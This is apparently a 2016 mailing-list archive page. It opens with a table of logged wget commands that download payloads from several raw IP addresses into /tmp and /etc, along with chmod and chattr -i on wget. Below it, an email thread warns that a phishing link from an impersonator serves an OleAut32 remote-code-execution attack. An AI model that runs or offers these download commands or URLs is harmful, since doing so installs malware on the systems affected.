[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[no subject]



0	1
wget http://125.88.183.7:10258/san.txt	 http://125.88.183.7:10258/san.txt
wget http://125.88.183.7:10258/tplin	 http://125.88.183.7:10258/tplin
wget http://219.234.6.206:8080/journal -c &> /dev/null	 http://219.234.6.206:8080/journal -c &> /dev/null
wget http://219.234.6.206:8080/hades -c &> /dev/null	 http://219.234.6.206:8080/hades -c &> /dev/null
wget http://219.234.6.206:8080/journal -c &> /dev/null	 http://219.234.6.206:8080/journal -c &> /dev/null
wget http://219.234.6.206:8080/hades -c &> /dev/null	 http://219.234.6.206:8080/hades -c &> /dev/null
wget http://219.234.6.206:8080/journal -c &> /dev/null	 http://219.234.6.206:8080/journal -c &> /dev/null
wget http://219.234.6.206:8080/hades -c &> /dev/null	 http://219.234.6.206:8080/hades -c &> /dev/null
wget -O /tmp/udp http://117.21.173.4:5896/udp	 -O /tmp/udp http://117.21.173.4:5896/udp
chmod 0755 /usr/bin/wget	chmod 0755 /usr/bin/wget
chattr -i /usr/bin/wget	chattr -i /usr/bin/wget
wget http://123.206.21.11:9925/tfip	 http://123.206.21.11:9925/tfip
wget http://123.206.21.11:9925/v9	 http://123.206.21.11:9925/v9
wget http://123.206.21.11:9925/tfip	 http://123.206.21.11:9925/tfip
wget http://123.206.21.11:9925/v9	 http://123.206.21.11:9925/v9
wget http://123.206.21.11:9925/tfip	 http://123.206.21.11:9925/tfip
wget http://123.206.21.11:9925/v9	 http://123.206.21.11:9925/v9
wget http://123.206.21.11:9925/tfip	 http://123.206.21.11:9925/tfip
wget http://123.206.21.11:9925/v9	 http://123.206.21.11:9925/v9
wget http://123.206.21.11:9925/tfip	 http://123.206.21.11:9925/tfip
wget http://123.206.21.11:9925/v9	 http://123.206.21.11:9925/v9
wget http://123.206.21.11:9925/tfip	 http://123.206.21.11:9925/tfip
wget http://123.206.21.11:9925/v9	 http://123.206.21.11:9925/v9
wget http://123.206.21.11:9925/ip	 http://123.206.21.11:9925/ip
wget http://123.206.21.11:9925/ip	 http://123.206.21.11:9925/ip
wget http://123.206.21.11:9925/ip	 http://123.206.21.11:9925/ip
wget http://123.206.21.11:9925/ip	 http://123.206.21.11:9925/ip
wget http://222.186.25.51:22/sha.33	 http://222.186.25.51:22/sha.33
wget http://222.186.25.51:22/yumen.32	 http://222.186.25.51:22/yumen.32
wget http://222.186.25.51:22/sha.33	 http://222.186.25.51:22/sha.33
wget http://222.186.25.51:22/yumen.32	 http://222.186.25.51:22/yumen.32
wget http://222.186.25.51:22/yumen.32	 http://222.186.25.51:22/yumen.32
wget http://222.186.25.51:22/yumen.32	 http://222.186.25.51:22/yumen.32
wget http://222.186.25.51:22/yumen.32	 http://222.186.25.51:22/yumen.32
wget http://222.186.25.51:22/yumen.32	 http://222.186.25.51:22/yumen.32
wget http://123.206.21.11:9925/ip	 http://123.206.21.11:9925/ip
wget http://123.206.21.11:9925/ip	 http://123.206.21.11:9925/ip
wget http://123.206.21.11:9925/ip	 http://123.206.21.11:9925/ip
wget http://123.206.21.11:9925/ip	 http://123.206.21.11:9925/ip
wget http://123.206.21.11:9925/ip	 http://123.206.21.11:9925/ip
wget http://123.206.21.11:9925/ip	 http://123.206.21.11:9925/ip
wget -O /etc/TV9 http://117.21.173.4:5896/TV9	 -O /etc/TV9 http://117.21.173.4:5896/TV9
chmod 0755 /usr/bin/wget	chmod 0755 /usr/bin/wget
chattr -i /usr/bin/wget	chattr -i /usr/bin/wget
wget http://222.186.25.51:22/shangdu	 http://222.186.25.51:22/shangdu
wget http://222.186.25.51:22/shangdu	 http://222.186.25.51:22/shangdu
wget http://222.186.25.51:22/shangdu	 http://222.186.25.51:22/shangdu

-----Original Message-----
From: John Young [mailto:[email protected]] 
Sent: Tuesday, May 10, 2016 7:58 AM
To: [email protected]; Greg Moss <[email protected]>
Subject: Re:

Great, "Greg." Log on to the IP address, click on journal. Prepare to buy new hard disk, hopelessly try to clean out back-ups, avoid for life the suckers you infected.

Then try to get out of jail from the phishing gangsters who entrapped you by getting into your TEMPEST-hardened computer setup and threatening to send to your relatives and customers their implanted vile kiddie porn collection as if yours and report to the FBI "Greg's" vast cache of stolen celebrity accounts and hundreds of nyms, Tor logs, USG break-ins, counterfeit Bitcoins, comsec dirty work, rattings to LE, and, listen, hear what's buzzing over your bunker. battering your steel gate.

At 10:20 AM 5/10/2016, you wrote:

>Most interested in the Journal file. Could someone have a look?
>On May 10, 2016 3:53 AM, "John Young" 
><<mailto:[email protected]>[email protected]> wrote:
>At 02:13 AM 5/10/2016, Greg Moss imposter phished:
><http://219.234.6.206:8080/>http://219.234.6.206:8080/
>
>
>Which produces:
>
>Web attack: Microsoft OleAut32 RCE CVE-2014-6332
>
>